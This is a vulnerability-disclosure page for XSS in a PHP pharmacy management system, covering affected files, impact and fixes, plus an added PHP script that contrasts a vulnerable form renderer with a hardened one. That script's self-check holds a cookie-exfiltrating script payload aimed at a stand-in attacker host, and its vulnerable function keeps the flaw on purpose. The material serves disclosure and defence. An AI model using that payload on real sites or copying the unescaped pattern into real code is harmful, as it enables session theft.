Submit #555918: Sourcecodester Web-based Pharmacy Product Management System v1.0 Cross Site Scripting

Title: Sourcecodester Web-based Pharmacy Product Management System v1.0 Cross Site Scripting
Description:

# Cybersecurity Analysis Report: XSS Vulnerability in Web-based Pharmacy Product Management System

## Vulnerability Overview

Multiple stored Cross-Site Scripting (XSS) vulnerabilities were identified in version 1.0 of the Web-based Pharmacy Product Management System, affecting several critical functional modules.

## Technical Analysis

### Vulnerability Details

- **Vulnerability Type**: Stored Cross-Site Scripting (XSS) (CWE-79)
- **Affected Files**:
  - `add-admin.php`
  - `changepassword.php`
  - `add-stock.php`
  - `add-product.php`
  - `add-category.php`
  - `add-supplier.php`

### Root Cause

The system does not filter or escape user input: POST parameters are echoed directly back into the HTML page, so attacker-supplied script is stored and executed. Note that echoing a POST parameter straight into the response is the reflected form of CWE-79; the stored form applies where the same unescaped value is also written to the database and rendered in later pages (listings, edit forms). The fix is the same in both cases: contextual output encoding at the point where the value is written into HTML.

### Attack Vectors

An attacker exploits this by:

1. Injecting JavaScript into the form fields of the affected pages (for example the `txtfullname`, `txtemail` and `txtpassword` fields of `add-admin.php`)
2. Having that script execute in the browser of an administrator or other user who views the affected page

## Impact Assessment

- **Severity**: High
- **Potential Impact**:
  - Session hijacking (cookie theft, unless the session cookie carries the `HttpOnly` flag)
  - Phishing (injected content that alters the page the victim sees)
  - Defacement of the application interface
  - Privilege escalation, since the script runs in the session of the viewing administrator and can issue requests on their behalf

## Remediation Recommendations

### Immediate Fixes

1. **Input Validation**:

   ```php
   // Example: reject a malformed e-mail address before it is processed
   if (!filter_var($_POST['txtemail'], FILTER_VALIDATE_EMAIL)) {
       die("Invalid email format");
   }
   ```

2. **Output Encoding** (the actual XSS fix; validation alone is not sufficient, because a syntactically valid name or address can still contain characters that are special in HTML):

   ```php
   // Encode user data every time it is written into HTML (text or quoted attribute)
   $safe_email = htmlspecialchars($_POST['txtemail'], ENT_QUOTES, 'UTF-8');
   ```

3. **Content Security Policy (CSP)** as defense in depth. The header must be sent before any output, and `script-src 'self'` also blocks the application's own inline scripts and event handlers, which then have to move to external files:

   ```php
   header("Content-Security-Policy: default-src 'self'; script-src 'self'");
   ```

### Long-term Security Hardening

1. Implement a comprehensive Security Development Lifecycle (SDL)
2. Introduce automated security testing tools
3. Conduct regular security code audits

## Best Practice Recommendations

1. Implement allow-list ("whitelist") validation for all user inputs
2. Use prepared statements to prevent SQL injection
3. Apply the principle of least privilege
4. Regularly update dependencies and frameworks

## Conclusion

This vulnerability poses a serious security risk to the system. Immediate remediation following the recommendations above is advised. A comprehensive security audit of the entire system is also recommended to identify and address other potential vulnerabilities. For further technical support or detailed remediation plans, please contact the cybersecurity team at any time.
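The following script is an added example, not code from the report above or from the Sourcecodester project. It reconstructs the pattern the report describes (POST parameters echoed straight back into HTML) for `add-admin.php` and places a hardened version next to it that combines the three immediate fixes: validation, output encoding through one encoder applied at every interpolation point, and a CSP header sent before output. The field names `txtfullname`, `txtemail` and `txtpassword` follow the VulDB entry; the HTML skeleton, the error messages and the payload are assumed or constructed, and the real `add-admin.php` may differ. The built-in check feeds an attribute-breakout payload through both renderers and confirms that only the vulnerable one emits a live `<script>` tag. Requires PHP 8.0 or later.

```php
<?php
// Added example, not code from the report or the Sourcecodester project. It
// reconstructs the pattern the report describes (POST parameters echoed back
// into HTML) for add-admin.php and places a hardened version next to it. Field
// names txtfullname/txtemail/txtpassword follow the VulDB entry; the HTML
// skeleton and the error messages are assumed. Requires PHP 8.0+ (str_contains).
declare(strict_types=1);

// Vulnerable pattern: POST values are interpolated straight into HTML. A value
// beginning with "> closes the input's value attribute and adds a script tag.
function render_form_vulnerable(array $post): string
{
    $fullname = (string) ($post['txtfullname'] ?? '');
    $email    = (string) ($post['txtemail'] ?? '');
    return '<form method="post" action="add-admin.php">'
         . '<input type="text" name="txtfullname" value="' . $fullname . '">'
         . '<input type="text" name="txtemail" value="' . $email . '">'
         . '<p>Created admin: ' . $fullname . '</p>'
         . '</form>';
}

// Encoder for HTML text and quoted-attribute contexts. ENT_QUOTES encodes both
// quote characters; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning
// an empty string, so a malformed byte cannot blank out the output silently.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Validation rejects malformed input, but it is not the XSS fix on its own: a
// syntactically valid name or address can still contain HTML-significant
// characters, so the encoder is applied to every field regardless.
function validate_admin_input(array $post): array
{
    $errors = [];
    $fullname = trim((string) ($post['txtfullname'] ?? ''));
    if ($fullname === '' || strlen($fullname) > 100) {
        $errors[] = 'Full name must be 1-100 bytes.';
    }
    if (!filter_var((string) ($post['txtemail'] ?? ''), FILTER_VALIDATE_EMAIL)) {
        $errors[] = 'Invalid email format.';
    }
    if (strlen((string) ($post['txtpassword'] ?? '')) < 12) {
        $errors[] = 'Password must be at least 12 characters.';
    }
    return $errors;
}

// Hardened pattern: every interpolation goes through e(), including the error
// messages, which would otherwise become a second place that echoes input.
function render_form_hardened(array $post): string
{
    $fullname = (string) ($post['txtfullname'] ?? '');
    $email    = (string) ($post['txtemail'] ?? '');
    $html = '<form method="post" action="add-admin.php">'
          . '<input type="text" name="txtfullname" value="' . e($fullname) . '">'
          . '<input type="text" name="txtemail" value="' . e($email) . '">'
          . '<p>Created admin: ' . e($fullname) . '</p>';
    foreach (validate_admin_input($post) as $err) {
        $html .= '<p class="error">' . e($err) . '</p>';
    }
    return $html . '</form>';
}

// Defense in depth from the report's third recommendation. The header must go
// out before the first byte of HTML; headers_sent() turns a late call into a
// no-op instead of a warning.
function send_csp(): void
{
    if (!headers_sent()) {
        header("Content-Security-Policy: default-src 'self'; script-src 'self'");
    }
}

// Constructed request (not a captured one): an attribute-breakout payload in
// the name field, a valid address, and a too-short password.
function self_check(): bool
{
    $payload = '"><script>location="https://attacker.example/?c="+document.cookie</script>';
    $post = ['txtfullname' => $payload, 'txtemail' => 'admin@example.com', 'txtpassword' => 'short'];

    $vuln = render_form_vulnerable($post);
    $safe = render_form_hardened($post);

    return str_contains($vuln, '<script>')            // breakout succeeds
        && !str_contains($safe, '<script>')           // encoded as &lt;script&gt;
        && str_contains($safe, '&lt;script&gt;')
        && str_contains($safe, 'Password must be at least 12 characters.');
}

send_csp();
$ok = self_check();
echo $ok ? "hardened output is inert\n" : "check failed\n";
exit($ok ? 0 : 1);
```

Run it with `php add-admin-example.php`; a zero exit code means the vulnerable renderer reproduced the breakout while the hardened renderer neutralised it. The single `e()` helper is the design point: the report's fix is effective only if it is applied at every place a value reaches HTML, so in a real code base the grep target is any `echo`/`.` concatenation of `$_POST` or database values that does not pass through the encoder.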
Source: https://github.com/yaklang/IRifyScanResult/blob/main/Web-based%20Pharmacy%20Product%20Management%20System/xss_from_input_with_post.md
User: lingze (UID 83608)
Submission: 04/10/2025 15:32
Moderation: 04/19/2025 16:16 (9 days later)
Status: Accepted
VulDB entry: 305728 [SourceCodester Web-based Pharmacy Product Management System 1.0 add-admin.php txtpassword/txtfullname/txtemail cross site scripting]
Points: 20